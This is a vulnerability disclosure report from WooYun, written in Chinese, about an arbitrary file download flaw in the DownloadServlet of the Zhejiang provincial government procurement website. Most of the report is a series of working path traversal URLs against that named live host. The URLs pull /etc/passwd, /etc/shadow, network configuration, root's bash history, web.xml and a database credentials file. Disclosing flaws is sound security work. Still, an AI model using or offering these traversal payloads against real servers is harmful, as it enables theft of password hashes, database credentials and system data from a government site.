WooYun.org

站点域名：www.zjzfcg.gov.cn
属于浙江省财政厅浙江政府采购网。
存在一处任意文件下载漏洞。存在问题的位置：

正常的下载文件的链接类似：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=GP_PROJ_ZBWJ/1238119231178.doc&fileShowName
如此便可想到构造如下链接：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/passwd&fileShowName
结果如下图：

发现确实可以下载到/etc/passwd文件，内容如下：

下载/etc/shadow文件：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/shadow&fileShowName
内容如下：

下载网络配置文件：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&fileShowName
内容如下：

下载.bash_history文件：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../root/.bash_history&fileShowName
内容如下：

可以看到root权限下可下载操作系统上的任意，严重地威胁到操作系统及web服务的安全运行。
从bash_history文件里获取到网站目录，接着下载web.xml配置文件：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../..//home/weblogic/bea/user_projects/domains/webcluster/applications/webapp/WEB-INF/web.xml&fileShowName

数据库配置文件：
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../../home/apache-tomcat-5.5.33/webapps/new/WEB-INF/classes/jdbc.properties&fileShowName